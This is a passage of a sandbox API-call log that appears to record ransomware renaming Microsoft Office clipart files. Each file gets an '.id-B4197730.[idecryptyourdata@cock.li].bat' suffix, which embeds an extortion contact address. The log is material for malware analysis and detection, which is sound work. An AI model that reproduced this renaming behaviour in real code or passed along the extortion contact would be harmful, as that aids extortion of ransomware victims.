dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.451] CloseHandle (hObject=0x378) returned 1 [0172.452] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.452] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.454] CloseHandle (hObject=0x378) returned 1 [0172.456] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.456] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.456] CloseHandle (hObject=0x378) returned 1 [0172.457] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.457] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.457] CloseHandle (hObject=0x378) returned 1 [0172.458] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.458] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.459] CloseHandle (hObject=0x378) returned 1 [0172.459] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.460] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.460] CloseHandle (hObject=0x378) returned 1 [0172.461] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.461] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.462] CloseHandle (hObject=0x378) returned 1 [0172.463] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.463] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.464] CloseHandle (hObject=0x378) returned 1 [0172.465] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.465] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.466] CloseHandle (hObject=0x378) returned 1 [0172.466] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.466] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.467] CloseHandle (hObject=0x378) returned 1 [0172.467] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.467] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.468] CloseHandle (hObject=0x378) returned 1 [0172.469] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.469] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.470] CloseHandle (hObject=0x378) returned 1 [0172.470] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.471] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.471] CloseHandle (hObject=0x378) returned 1 [0172.472] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.472] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.472] CloseHandle (hObject=0x378) returned 1 [0172.473] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.473] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.473] CloseHandle (hObject=0x378) returned 1 [0172.474] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.474] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.475] CloseHandle (hObject=0x378) returned 1 [0172.475] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.475] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.476] CloseHandle (hObject=0x378) returned 1 [0172.477] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.477] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.477] CloseHandle (hObject=0x378) returned 1 [0172.478] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.478] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.479] CloseHandle (hObject=0x378) returned 1 [0172.479] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.578] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.659] CloseHandle (hObject=0x378) returned 1 [0172.908] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.908] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.208] CloseHandle (hObject=0x3d4) returned 1 [0173.587] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.587] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.588] CloseHandle (hObject=0x3ac) returned 1 [0173.589] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.589] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.589] CloseHandle (hObject=0x3ac) returned 1 [0173.590] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.591] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.591] CloseHandle (hObject=0x3ac) returned 1 [0173.592] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.592] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.592] CloseHandle (hObject=0x3ac) returned 1 [0173.593] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.593] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.594] CloseHandle (hObject=0x3ac) returned 1 [0173.595] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.595] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.596] CloseHandle (hObject=0x3ac) returned 1 [0173.597] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.597] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.597] CloseHandle (hObject=0x3ac) returned 1 [0173.599] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.599] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.599] CloseHandle (hObject=0x3ac) returned 1 [0173.600] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.600] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.601] CloseHandle (hObject=0x3ac) returned 1 [0173.601] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.601] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.602] CloseHandle (hObject=0x3ac) returned 1 [0173.604] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.604] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.604] CloseHandle (hObject=0x3ac) returned 1 [0173.605] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.605] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.605] CloseHandle 